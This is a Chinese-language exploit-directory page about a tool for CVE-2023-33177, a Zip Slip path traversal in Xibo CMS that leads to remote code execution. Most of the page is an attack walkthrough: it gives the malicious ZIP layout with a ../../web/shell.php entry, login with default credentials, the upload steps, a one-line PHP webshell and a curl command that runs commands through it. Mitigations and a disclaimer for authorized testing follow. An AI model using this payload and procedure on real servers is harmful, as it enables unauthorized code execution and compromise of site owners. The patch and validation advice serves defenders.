Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177 — 此漏洞利用工具演示了 Xibo CMS(CVE-2023-33177)中的**路径遍历漏洞**,该漏洞允许通过恶意布局导入实现远程代码执行。 | Kitploit
工具/GitHubGitHub/complexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubcomplexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177

Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177

此漏洞利用工具演示了 Xibo CMS(CVE-2023-33177)中的**路径遍历漏洞**,该漏洞允许通过恶意布局导入实现远程代码执行。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
9个月前尚未审核

Xibo CMS Zip Slip RCE 漏洞利用工具 CVE-2023-33177

该漏洞利用工具演示了 Xibo CMS(CVE-2023-33177)中的路径遍历漏洞,该漏洞可通过恶意布局文件导入实现远程代码执行。

漏洞详情

CVE/公告: CVE-2023-33177 受影响版本:

  • Xibo CMS 1.8.0 - 2.3.16
  • Xibo CMS 3.0.0 - 3.3.4

漏洞类型: 路径遍历(Zip Slip) 影响: 远程代码执行(RCE)

技术摘要

Xibo CMS 允许已认证用户通过 ZIP 压缩包导入布局文件。导入功能未能正确验证 mapping.json 文件中的文件路径,攻击者可以利用路径遍历序列(../../)将文件写入预期库目录之外。

漏洞利用原理

  1. 创建有效的 Xibo 布局导出结构,包含必需的 JSON 文件
  2. 在 mapping.json 中注入路径遍历:使用 ../../web/shell.php 作为文件路径
  3. 将 WebShell 放置在 ZIP 结构中的遍历路径:位于 library/../../web/shell.php
  4. Xibo 未经验证即进行解压:解析为 /var/www/cms/web/shell.php
  5. 实现 RCE:WebShell 可通过 Web 根目录访问

漏洞利用链

root@kitploit:~
Zip 包含: library/../../web/shell.php
Xibo 读取:   library/ + ../../web/shell.php(来自 mapping.json)
Xibo 写入:  /var/www/cms/library/temp/ + ../../web/shell.php
结果:       /var/www/cms/web/shell.php ← WebShell 位于 Web 根目录!

使用方法

生成漏洞利用文件

root@kitploit:~
python3 create_exploit.py

该命令会创建包含恶意布局包的 exploit.zip。

利用步骤

  1. 访问 Xibo CMS 并使用凭据登录(默认:xibo_admin / password)
  2. 导航至导入:Design → Layouts → Import
  3. 上传 exploit.zip
  4. 忽略任何 JSON 错误 - WebShell 已写入磁盘
  5. 通过 WebShell 执行命令:
    root@kitploit:~
    curl 'http://localhost:8080/shell.php?cmd=id'
    

文件结构

漏洞利用 ZIP 包含:

root@kitploit:~
exploit.zip
├── layout.json          # 有效的 Xibo 布局定义
├── playlist.json        # 空播放列表(触发 JSON 导入)
├── mapping.json         # 包含路径遍历载荷
└── library/
    └── ../../web/
        └── shell.php    # PHP WebShell(被解压至 Web 根目录)

WebShell 功能

内置的 WebShell 非常简洁:

root@kitploit:~
<?php system($_GET["cmd"]); ?>

通过以下地址访问:http://<target>/shell.php?cmd=<command>

缓解措施

已修复版本:

  • 升级至 Xibo CMS 2.3.17+(适用于 2.x 分支)
  • 升级至 Xibo CMS 3.3.5+(适用于 3.x 分支)

缓解策略:

  1. 解压前验证 ZIP 压缩包中的所有文件路径
  2. 拒绝包含 .. 或绝对路径的路径
  3. 使用可防止目录遍历的安全解压方法
  4. 对导入功能实施适当的输入验证
  5. 将文件上传权限限制为仅限已认证的授权用户

法律与道德声明

此漏洞利用工具仅用于:

  • 教育目的
  • CTF 竞赛
  • 授权安全测试
  • 防御性安全研究

请勿将本漏洞利用工具用于非您所有或未经明确授权测试的系统。

参考资料

  • 公告: GHSA-jj27-x85q-crqv
  • Xibo CMS: https://xibo.org.uk/
  • Zip Slip 漏洞: https://security.snyk.io/research/zip-slip-vulnerability
  • CVE-2023-33177: https://nvd.nist.gov/vuln/detail/CVE-2023-33177

作者

complexusprada 2025 年 11 月

下载工具